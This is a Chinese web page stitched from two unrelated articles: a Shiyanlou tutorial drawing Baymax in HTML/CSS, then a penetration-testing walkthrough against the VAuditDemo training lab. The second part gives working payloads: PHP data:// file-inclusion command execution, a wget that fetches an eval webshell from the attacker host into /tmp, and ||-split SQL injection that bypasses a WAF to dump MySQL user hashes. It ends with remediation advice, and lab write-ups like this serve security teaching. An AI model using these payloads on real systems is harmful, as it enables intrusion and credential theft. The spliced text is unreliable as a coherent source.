課程利用 HTML 和 CSS 來打造 《超能陸戰(zhàn)隊(duì)》里的“暖男”—大白,可學(xué)習(xí)如何用 HTML 結(jié)合 CSS 來設(shè)計(jì)高端大氣上檔次的圖,并了解 HTML 布局,CSS 構(gòu)建對(duì)象樣式。
本教程由BigGod發(fā)布在實(shí)驗(yàn)樓,完整教程、代碼及在線練習(xí)地址:純 CSS 打造網(wǎng)頁版「大白」——https://www.shiyanlou.com/courses/328
1.1 實(shí)驗(yàn)內(nèi)容
還記得《超能陸戰(zhàn)隊(duì)》里的 “暖男” -「大白」 么?是不是很想擁有一個(gè)?
沒問題!今天我們就利用 HTML 和 CSS 來打造自己的「大白」! 最終效果:
1.2 實(shí)驗(yàn)知識(shí)點(diǎn)
div 布局
CSS 相對(duì)定位
CSS 各種屬性的應(yīng)用
1.3 實(shí)驗(yàn)環(huán)境
本實(shí)驗(yàn)環(huán)境采用帶桌面的 Ubuntu Linux 環(huán)境,實(shí)驗(yàn)中可能會(huì)用到桌面上的程序:
Firefox:瀏覽器,可以用在需要前端界面的課程里,只需要打開環(huán)境里寫的 HTML/JS 頁面即可;
GVim:非常好用的編輯器,最簡單的用法可以參考課程 Vim編輯器
1.4 適合人群
本課程難度一般,只要你學(xué)過基本的 HTML 和 CSS 就能做出來。
進(jìn)入到 /home/shiyanlou/ 目錄下,新建空白文檔:
命名為 Baymax.html (其它名字也可以,但后綴名必須是 .html):
使用 gedit 打開,準(zhǔn)備編輯代碼:
下面通過 div定義大白身體的各個(gè)部位:
<!doctype html> <html> <head> <meta charset="utf-8"> <title>Baymax</title> </head> <body>
3.2 添加 CSS 樣式
我們已經(jīng)使用 HTML 定義好「大白」的各個(gè)元素,現(xiàn)在就需要利用到 CSS 來繪制它的樣式外表。
由于「大白」是白色的,為了更容易辨識(shí),我們把背景設(shè)為深色。然后首先是頭部:
<style> body { background: #595959;
效果預(yù)覽:
趕緊再來添加眼睛和嘴吧!
#eye, #eye2 { width: 11px; height: 13px; background: #282828; border-radius: 50%; position: relative; top: 30px; left: 27px; /*旋轉(zhuǎn)該元素*/
一個(gè) mini 的「大白」,雛形初現(xiàn):
接下來是軀干和腹部:
#torso, #belly { margin: 0 auto; height: 200px; width: 180px; background: #fff; border-radius: 47%; /*設(shè)置邊框*/
賦予「大白」象征生命的心臟:
#heart{ width:25px;
現(xiàn)在的「大白」是這個(gè)樣子的了:
還沒有手和腳,怪萌怪萌的...「大白」需要溫暖的手臂:
#left-arm, #right-arm { height: 270px; width: 120px; border-radius: 50%; background: #fff; margin: 0 auto; position: relative; top: -350px; left: -100px; transform: rotate(20deg); z-index: -1;
還沒有手指頭呢:
#l-bigfinger, #r-bigfinger { height: 50px; width: 20px; border-radius: 50%; background: #fff; position: relative; top: 250px; left: 50px; transform: rotate(-50deg);
有點(diǎn)意思了:
迫不及待要給「大白」加上腿了吧:
#left-leg, #right-leg { height: 170px; width: 90px; border-radius: 40% 30% 10px 45%; background: #fff; position: relative; top: -640px; left: -45px; transform: rotate(-1deg); z-index: -2; margin: 0 auto;
duang~ duang~ duang~ 特技完成!
3.3 完整代碼
本課程使用 div+css 畫出了萌萌的大白,相信通過完成本實(shí)驗(yàn)?zāi)芗由钅銓?duì) div 布局的理解以及提高對(duì) css 各種屬性的運(yùn)用能力。
代碼中還有不少重復(fù)的地方,試著進(jìn)一步簡化代碼
運(yùn)用 CSS 動(dòng)畫讓大白的眼睛動(dòng)起來
本教程的完整步驟、代碼及在線練習(xí)地址——https://www.shiyanlou.com/courses/328(更多課程請(qǐng)查看全部 - 課程 - 實(shí)驗(yàn)樓)
純純純手工!純CSS打造24K純網(wǎng)頁版大白!來不及解釋了,直接上視頻預(yù)覽:
<script src="https://lf6-cdn-tos.bytescm.com/obj/cdn-static-resource/tt_player/tt.player.js?v=20160723"></script>
嘿、嘿
準(zhǔn)備好了沒有?
你看這大白,他又胖又圓
就像這段代碼,他漂亮又簡單
你們來這里 編程,
覺得 代碼 很 好玩,
我看行,
你們來這學(xué) 編程 ,
我給你們學(xué)習(xí)一樣開心,
文檔地址:http://t.cn/EK5z2VK
教程地址:點(diǎn)擊文末 閱讀原文 學(xué)習(xí)教程。
教程費(fèi)用:免費(fèi)。
教程預(yù)覽:
教程評(píng)價(jià):
相關(guān)推薦
50個(gè)Python練手項(xiàng)目,拿去過冬吧!
10個(gè)不到500行代碼的超牛Python練手項(xiàng)目
10個(gè)精彩Python視頻教程整理,10種新技能輕松Get!
30本Python學(xué)習(xí)參考書,從入門到大師全了!
大牛推薦的10本學(xué)習(xí)Java必看書
如何開始使用Java機(jī)器學(xué)習(xí)
再別說找不到C++練手項(xiàng)目,這20個(gè)拿去不謝!
寫在開始:進(jìn)行web滲透測(cè)試之前,務(wù)必獲得測(cè)試目標(biāo)擁有者或組織的書面授權(quán),明確滲透測(cè)試的范圍。在授權(quán)范圍內(nèi)進(jìn)行滲透測(cè)試,測(cè)試結(jié)束之后,務(wù)必清除滲透測(cè)試留下的痕跡,包括訪問日志、事件記錄、上傳的shell腳本、創(chuàng)建的影子賬戶等等。
滲透測(cè)試,并沒有一個(gè)標(biāo)準(zhǔn)的定義,但通常被解釋為一種評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全的方法。這個(gè)過程模擬惡意黑客的攻擊方式,以尋找并利用系統(tǒng)中的安全漏洞。滲透測(cè)試旨在挖掘目標(biāo)系統(tǒng)的安全漏洞,取得系統(tǒng)的控制權(quán),訪問系統(tǒng)的機(jī)密數(shù)據(jù),并發(fā)現(xiàn)可能影響業(yè)務(wù)持續(xù)運(yùn)作的安全隱患。
滲透測(cè)試與黑客入侵的最大區(qū)別在于其進(jìn)行方式。滲透測(cè)試是經(jīng)過客戶授權(quán),采用可控制、非破壞性質(zhì)的方法和手段對(duì)目標(biāo)和網(wǎng)絡(luò)設(shè)備進(jìn)行檢測(cè)。這不僅能幫助管理者了解他們網(wǎng)絡(luò)所面臨的問題,還能提供針對(duì)這些問題的安全加固建議,從而幫助客戶提升系統(tǒng)的安全性。
滲透測(cè)試按照軟件測(cè)試的理念分為三種類型:白盒測(cè)試、黑盒測(cè)試、灰盒測(cè)試。其中白盒測(cè)試是基于代碼審查,再結(jié)合漏洞掃描等技術(shù)進(jìn)行,黑盒測(cè)試在業(yè)內(nèi)也稱為盲測(cè),除了有測(cè)試范圍之外,其他全部模擬黑客攻擊的過程進(jìn)行操作,灰盒測(cè)試是結(jié)合白盒測(cè)試的代碼審計(jì)、黑盒測(cè)試的攻擊策略和技術(shù)的一種折中類型。白盒測(cè)試的因?yàn)閾碛心繕?biāo)所有內(nèi)部與底層的知識(shí),因此可以用最小的代價(jià)發(fā)現(xiàn)更多嚴(yán)重的隱藏的漏洞。黑盒測(cè)試因?yàn)槭敲y(cè),因此需要依賴較高的技術(shù)能力,攻擊方式也變得多樣性,從而可以更完整的評(píng)估目標(biāo)的安全風(fēng)險(xiǎn),也可以檢測(cè)到目標(biāo)團(tuán)隊(duì)的應(yīng)急能力?;液袦y(cè)試集兩者之長,既能快速全面檢測(cè)出漏洞,同時(shí)還具備了更完整的安全風(fēng)險(xiǎn)評(píng)估能力。
安全漏洞生命周期劃分
安全漏洞被發(fā)現(xiàn)到其消亡的過程被劃分為7個(gè)步驟,其中包含的概念如下:
Exploit,簡稱EXP,利用安全漏洞造成入侵或破壞的滲透代碼,又叫漏洞利用代碼
POC:Proof of Concept:概念驗(yàn)證,只是驗(yàn)證漏洞的存在,并不會(huì)利用該漏洞進(jìn)行入侵。
Exploit:EXP:發(fā)現(xiàn)漏洞后,使用惡意代碼或惡意指令進(jìn)行漏洞的利用和入侵。
0 Day:第一個(gè)發(fā)現(xiàn)的漏洞,同時(shí)官方還沒有發(fā)布補(bǔ)丁,也未公開該漏洞,漏洞處于可利用階段。
RCE:Remote Code/Command Execution 遠(yuǎn)程代碼/命令執(zhí)行。
SRC:安全應(yīng)急響應(yīng)中心 Security Emergency Response Center。
滲透測(cè)試步驟分為前期交互、情報(bào)收集、匯總分析、滲透攻擊、后滲透攻擊、報(bào)告提交等六個(gè)階段
1、前期交互:這個(gè)階段主要是和委托方進(jìn)行商討洽談、獲取書面授權(quán)、測(cè)試范圍的確定等工作
2、情報(bào)搜集:在獲得授權(quán)的基礎(chǔ)上,對(duì)測(cè)試目標(biāo)進(jìn)行相應(yīng)的情報(bào)收集,包括網(wǎng)絡(luò)基本配置、域名、人員權(quán)限劃分、暴露的端口、系統(tǒng)入口、web后臺(tái)入口等
3、匯總分析:該階段基于上一步驟、對(duì)所有收集的信息進(jìn)行匯總整理、從中找出合適的滲透方向、策略,選定合適的工具以及人員分工
4、滲透攻擊:開始進(jìn)行漏洞挖掘、掃描、找出可用的載荷(payload),進(jìn)行漏洞利用
5、后滲透攻擊:getshell、上傳木馬、修補(bǔ)漏洞、清除痕跡和腳本
6、報(bào)告編寫:將所有找到的安全漏洞匯總為一份滲透測(cè)試報(bào)告,提交給委托方,完成滲透任務(wù)。
本文將依據(jù)以上的步驟以一個(gè)web靶場(chǎng)為例,闡述web滲透測(cè)試基本流程和注意事項(xiàng)。
服務(wù)器配置:
操作系統(tǒng)CentOS7、2核CPU、2G內(nèi)存、30G磁盤、網(wǎng)絡(luò)可以訪問,IP:192.168.211.132,部署xampp,vaudit
客戶端配置
主機(jī)操作系統(tǒng)windows11,IP:192.168.1.5
滲透機(jī)CentOS7,IP:192.168.211.129,部署xampp,存儲(chǔ)攻擊用的shell
從gitee上面下載的一個(gè)開源軟件vaudit,下載地址:https://github.com/1stPeak/VAuditDemo 作者是Virink。
1、先在CentOS上面安裝一個(gè)xampp5.6版本,
2、使用添加VHosts和端口的方式部署vaudit
在lampp/etc/extra目錄下面,通過添加新的vhosts虛擬主機(jī)的方式來進(jìn)行處理,只需要修改兩個(gè)配置文件即可。
(1)修改/opt/lampp/etc/httpd.conf,添加監(jiān)聽端口,并且包含httpd-vhosts.conf文件。
|
(2)修改/opt/lampp/etc/extra/httpd-vhosts.conf
|
3、修改基本配置
使用網(wǎng)站管理中的php配置,將allow_url_include設(shè)置為On,也就是需要使用到遠(yuǎn)程文件包含功能。
如果xampp啟動(dòng)失敗,需要在lampp的啟動(dòng)程序lampp中找到2.2.0,修改為2.8.0,如下位置
|
4、接下來修改并且配置數(shù)據(jù)庫連接,使用vi打開/opt/lampp/htdocs/vaudit/sys目錄下面的config.php文件
|
完成上述步驟之后,在瀏覽器中輸入http://192.168.211.132:81/ 看到VAuditDemo安裝界面
可以看出有兩個(gè)目錄沒有寫權(quán)限,需要sys和uploads進(jìn)行賦權(quán),在/www/admin/localhost_80/wwwroot下面執(zhí)行下面的命令,這里只需要給other賦予寫入權(quán)限即可。
chmod o+w sys uploads
然后刷新瀏覽器,現(xiàn)在看到可以安裝了
點(diǎn)擊安裝,看到如下提示,表示完成
點(diǎn)擊確定之后,進(jìn)入到vaudit的主頁面
現(xiàn)在我們需要熟悉這個(gè)軟件系統(tǒng)的基本功能,跟蹤和監(jiān)控web頁面上的各個(gè)接口及交互的數(shù)據(jù),這里需要使用到一些工具:sqlmap、burp suite、御劍后臺(tái)掃描工具、帶hackbar的firefox瀏覽器等。
先注冊(cè)一個(gè)用戶tester,然后使用tester進(jìn)入,開啟對(duì)系統(tǒng)的使用之旅,通過使用我們可以發(fā)現(xiàn),注冊(cè)普通用戶不需要驗(yàn)證碼,普通用戶修改用戶信息不需要二次驗(yàn)證,可以上傳圖頭像圖片,搜索接口,留言,查看留言,關(guān)于頁面等普通用戶可以點(diǎn)擊或使用的功能。
接下來使用御劍后臺(tái)掃描工具,對(duì)系統(tǒng)進(jìn)行掃描
通過掃描我們可以發(fā)現(xiàn),該目標(biāo)站點(diǎn)存在一個(gè)后臺(tái)登錄的頁面,可以試試看
這里可以看出后臺(tái)登錄是有驗(yàn)證碼的,看來暫時(shí)是動(dòng)不了這里。不過從這里我們可以看出已經(jīng)有好多個(gè)接口或功能可以提供給我們驗(yàn)證了,那么我們可以進(jìn)入下一個(gè)環(huán)節(jié),看看是否能夠找到一些滲透的切入點(diǎn)。
針對(duì)一個(gè)web系統(tǒng),能夠使用的滲透點(diǎn)主要包括登錄密碼的暴力破解、SQL注入、XSS注入、CSRF、文件包含等,對(duì)于普通用戶進(jìn)行暴力破解沒有必要,因?yàn)槲覀兛梢宰约鹤?cè)一個(gè)普通用戶,這里主要是考慮如何能夠切入到數(shù)據(jù)庫或者存儲(chǔ)型的XSS、如果有文件包含也不錯(cuò),可以進(jìn)行利用。
1、經(jīng)過反復(fù)測(cè)試,可以發(fā)現(xiàn)一個(gè)有意思的地方:http://192.168.211.128/index.php?module=about 這個(gè)地址的module翻譯過來為模塊,而about正好指向關(guān)于頁面。嘗試將about改成其他任意的單詞,看看頁面返回情況,在這個(gè)過程中可以發(fā)現(xiàn)頁面不會(huì)報(bào)錯(cuò),但是也沒有相應(yīng)的提示,那么這里應(yīng)該是一個(gè)文件包含的用法,沒有拋出錯(cuò)誤,估計(jì)是代碼中給文件加了后綴,并且做了異常控制??梢猿醪酱_認(rèn),這里存在一個(gè)文件包含的漏洞,需要進(jìn)一步驗(yàn)證。
2、接下來關(guān)注一下留言功能,這里是允許用戶輸入內(nèi)容的,在滲透中有一個(gè)核心的思想,那就是所有的輸入是否用戶可控,一般來說,用戶可控的輸入都有一定的幾率存在安全風(fēng)險(xiǎn),如果后端代碼未做過濾或者過濾不夠徹底,那么這些地方就是機(jī)會(huì),因此先從此處入手試試看。在這個(gè)位置,我們可以嘗試的有sql注入和存儲(chǔ)型XSS,先試試sql注入,由于留言屬于插入功能,因此這里優(yōu)先考慮報(bào)錯(cuò)注入,看看是否有機(jī)會(huì)
結(jié)果發(fā)現(xiàn),注入的sql代碼被原樣顯示,顯然這里沒有sql注入,那么再檢測(cè)一下是否可以進(jìn)行XSS,在輸入框中輸入以下代碼test<script>console.log(/test/)</script> 提交留言
可以看出,還是被原文顯示,說明這里漏洞也被堵了,那么點(diǎn)擊查看留言詳情試試,這里我們可以獲得留言詳情的接口地址:http://192.168.211.128/messageDetail.php?id=9 這里參數(shù)id看起來應(yīng)該是一個(gè)查詢條件,那么可以嘗試看看這里是否存在注入的可能。在hackbar中輸入http://192.168.211.128/messageDetail.php?id=9 or 1=1# 可以看到下圖顯示
從圖上可以看出這里有回顯,且從提示看一看出,sql代碼被waf(web application firewall),這里可以知道目標(biāo)使用了一種web防火墻基礎(chǔ),而or被替換為了sqlwaf,可以看出其防火墻代碼采取的是替換策略,那么根據(jù)經(jīng)驗(yàn)可以試試其他的關(guān)鍵字和關(guān)鍵符號(hào),看看替換中是否存在漏洞可以利用,在sql注入中,&&、||、_下劃線,單引號(hào),雙引號(hào)這些符號(hào)是非常有用的,如果這些符號(hào)被替換,那么我們可能就得另謀出路。因此將這幾個(gè)符號(hào)放在主要嘗試的位置。經(jīng)過嘗試可以發(fā)現(xiàn)下劃線、單引號(hào)和雙引號(hào)也被轉(zhuǎn)義了,而&&和||被替換為了空,這里就留下了一個(gè)注入漏洞,可以利用||來繞過關(guān)鍵字的waf。
從這里我們可以看出目前至少有兩個(gè)漏洞可以試試,下面我們就開始嘗試,看看這兩個(gè)漏洞是否可以進(jìn)行利用。
1、文件包含漏洞的利用
針對(duì)文件包含類的漏洞利用,需要知道的是有兩種包含方式,第一種就是本地文件包含,這種漏洞的利用可以獲取到服務(wù)器上面的基本信息,如果有文件上傳漏洞存在,則可以將二者進(jìn)行結(jié)合,從而getshell。而文件包含的利用需要用到php的偽協(xié)議相關(guān)的知識(shí),這里我們可以試試data偽協(xié)議。
先使用下面的payload試試
http://192.168.211.132:81/index.php?module=data://text/plain,<?php phpinfo();?>
這個(gè)結(jié)果表示,我們其實(shí)已經(jīng)可以執(zhí)行OS的命令,也就是getshell。比如可以執(zhí)行如下的payload
http://192.168.211.132:81/index.php?module=data://text/plain,<?php echo `ifconfig`;?>
可以看到已經(jīng)從服務(wù)器獲取到了信息,那么可以順著這個(gè)思路往下,將服務(wù)器上面的所有能看的文件都進(jìn)行瀏覽,從而獲取我們需要的信息。另外也可以實(shí)施掛馬的操作。從攻擊服務(wù)器上面去下載一個(gè)一句話木馬,如果在外網(wǎng)上面,那么服務(wù)器需要提供外網(wǎng)的訪問功能。服務(wù)器腳本的位置就直接方法/opt/lampp/htdocs下面,腳本名字可以根據(jù)需要來改,其內(nèi)容只有一句話<?php eval($_POST[0]);?> 在瀏覽器中執(zhí)行下面的payload
http://192.168.211.132:81/index.php?module=data://text/plain,<?php `wget http://192.168.211.129/shell.inc -O /tmp/shell.php`;?>
在被攻擊的服務(wù)器上面的/tmp目錄下面可以看到下面的結(jié)果
木馬上傳成功,后續(xù)可以使用蟻劍等工具進(jìn)行連接服務(wù),實(shí)施其他的操作。
2、sql注入漏洞利用
根據(jù)前面概念驗(yàn)證的結(jié)果,可以看出在返回留言詳情的地方可以進(jìn)行SQL注入,先嘗試最直接的方法就是聯(lián)合注入,payload如下
http://192.168.211.132:81/messageDetail.php?id=7 uni||on sel||ect database(),version(),user(),4 #
可以看到結(jié)果
從這里看出,其內(nèi)部數(shù)據(jù)庫配置的是本地用戶root@localhost,這里可以試試能否直接從information_schema中獲取表信息,使用payload如下,這里因?yàn)橐@開單引號(hào)轉(zhuǎn)義,需要把數(shù)據(jù)庫部分的'vauditdemo'轉(zhuǎn)成hex,即0x2776617564697464656d6f27
sel||ect table_name fr||om info||rmation_schema.tables whe||re table_schema=0x2776617564697464656d6f27
但是看到的結(jié)果如下:
這里可以看到內(nèi)部對(duì)下劃線做了轉(zhuǎn)義,因此無法從information_schema中遍歷數(shù)據(jù)庫信息,那就干脆試試能否從MySQL庫中獲取用戶信息,payload如下:
http://192.168.211.132:81/messageDetail.php?id=7 uni||on sel||ect database(),version(),user(),(sel||ect conc||at(host,0x7e,user,0x7e,passwo||rd) fr||om mysql.user) #
可以看到結(jié)果如下:
Subquery returns more than 1 row The result for [7 union select database(),version(),user(),(select concat(host,0x7e,user,0x7e,password) from mysql.user) ] is:
這里表示返回的數(shù)據(jù)不止一行,那可以使用limit進(jìn)行逐行遍歷,payload如下
http://192.168.211.132:81/messageDetail.php?id=7 uni||on sel||ect database(),version(),user(),(sel||ect conc||at(host,0x7e,user,0x7e,passwo||rd) fr||om mysql.user lim||it 0,1) #
可以看到結(jié)果
繼續(xù)遍歷,就可以發(fā)現(xiàn)數(shù)據(jù)庫里面的具體用戶信息,其中包含遠(yuǎn)程連接權(quán)限的用戶
這個(gè)時(shí)候需要對(duì)用戶humh的密碼進(jìn)行創(chuàng)庫破解,然后使用這個(gè)用戶進(jìn)行遠(yuǎn)程登錄到數(shù)據(jù)庫服務(wù)器,對(duì)數(shù)據(jù)庫進(jìn)行操作,這個(gè)時(shí)候就完美的避開了系統(tǒng)的waf。
1、文件包含問題
風(fēng)險(xiǎn)描述 | 文件包含漏洞 |
利用詳情 | 可以進(jìn)行遠(yuǎn)程文件包含,可以下載木馬到服務(wù)器 |
修復(fù)建議 | 停用遠(yuǎn)程文件包含功能,或者對(duì)用戶輸入的內(nèi)容進(jìn)行校驗(yàn),避免用戶輸入內(nèi)容中存在網(wǎng)絡(luò)地址的情況及非法的文件類型。 |
2、SQL注入風(fēng)險(xiǎn)
風(fēng)險(xiǎn)描述 | SQL注入 |
威脅等級(jí) | 高 |
利用詳情 | 可以通過SQL注入獲取到數(shù)據(jù)庫中的遠(yuǎn)程權(quán)限用戶,從而導(dǎo)致數(shù)據(jù)庫數(shù)據(jù)泄密 |
修復(fù)建議 | 對(duì)用戶輸入的內(nèi)容進(jìn)行校驗(yàn),將這些內(nèi)容轉(zhuǎn)換為真實(shí)html代碼,或在數(shù)據(jù)庫處理中使用預(yù)處理功能 |
2、報(bào)告模板
本文主要基于靶場(chǎng)環(huán)境,闡述web滲透中的一些技巧和方法,文中僅僅選取了兩個(gè)漏洞作為演示,該系統(tǒng)中實(shí)際包含的漏洞超過10個(gè),有需要者可以按照本文中的步驟去慢慢挖掘。
網(wǎng)絡(luò)安全是軟件系統(tǒng)質(zhì)量模型中的重要指標(biāo)之一,網(wǎng)絡(luò)漏洞和普通缺陷的區(qū)別在于普通的缺陷一般造成的是功能的失效,從而導(dǎo)致用戶使用存在困難或者用戶無法使用,而網(wǎng)絡(luò)安全漏洞則可能是在用戶無感知的情況下,被有心人進(jìn)行利用,從而導(dǎo)致用戶數(shù)據(jù),公司機(jī)密等重要信息的泄露,或者服務(wù)器或個(gè)人設(shè)備整個(gè)被轉(zhuǎn)成肉雞,為攻擊者的攻擊提供便利和掩護(hù)。網(wǎng)絡(luò)安全漏洞不需要多,一個(gè)就行,因此系統(tǒng)在研發(fā)開始就需要將網(wǎng)絡(luò)安全引入,現(xiàn)在流行的稱謂是安全左移,網(wǎng)絡(luò)安全要做到100%,甚至200%才可以。
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。